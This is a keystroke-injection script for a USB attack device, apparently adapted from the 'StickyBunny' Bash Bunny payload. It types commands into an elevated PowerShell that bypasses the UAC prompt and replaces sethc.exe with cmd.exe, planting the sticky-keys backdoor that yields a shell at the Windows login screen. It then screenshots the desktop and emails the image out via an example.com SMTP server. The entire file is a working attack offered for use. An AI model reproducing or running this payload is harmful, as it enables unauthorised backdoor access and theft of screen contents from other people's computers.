// Based on the Bash bunny payload "StickyBunny" by Squibs: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/execution/StickyBunny
layout('us');
press("GUI r");
delay(500);
type("powershell Start-Process powershell -Verb runAs\n")
delay(1000);
press("SHIFT TAB");
delay(100);
press("ENTER");
delay(500);
type("$Acl = Get-Acl sethc.exe")
press("ENTER")
delay(500);
type("$Ar = New-Object  system.security.accesscontrol.filesystemaccessrule($env:UserName,\"FullControl\",\"Allow\")")
press("ENTER")
delay(500);
type("$Acl.SetAccessRule($Ar)")
press("ENTER")
delay(500);
type("Set-Acl sethc.exe $Acl")
press("ENTER")
delay(500);
type("xcopy sethc.exe sethc.exe.bak")
press("ENTER")
delay(1500);
press("F")
delay(500);
type("xcopy cmd.exe sethc.exe")
press("ENTER")
delay(500);
press("Y")
press("ENTER")
delay(500);
type("$screenshot = New-Object System.Drawing.Bitmap( [System.Windows.Forms.SystemInformation]::VirtualScreen.Width, [System.Windows.Forms.SystemInformation]::VirtualScreen.Height )")
press("ENTER")
delay(500);
type("$g = [System.Drawing.Graphics]::FromImage($screenshot)")
press("ENTER")
delay(500);
type("$g.CopyFromScreen(0,0,[System.Windows.Forms.SystemInformation]::VirtualScreen.Width, [System.Windows.Forms.SystemInformation]::VirtualScreen.Height, [System.Drawing.CopyPixelOperation]::SourceCopy)")
press("ENTER")
delay(500);
type("$screenshot.Save(\"screenshot.png\", [System.Drawing.Imaging.ImageFormat]::Png)")
press("ENTER")
delay(500);
type("$emailFrom = \"sender@example.com\"\n")
type("$emailTo = \"recipient@example.com\"\n")
type("$emailSubject = \"Screenshot\"\n")
type("$emailBody = \"Attached is the screenshot\"\n")
type("$attachment = \"screenshot.png\"\n")
type("Send-MailMessage -From $emailFrom -To $emailTo -Subject $emailSubject -Body $emailBody -Attachment $attachment -SmtpServer smtp.example.com\n")
type("EXIT\n")
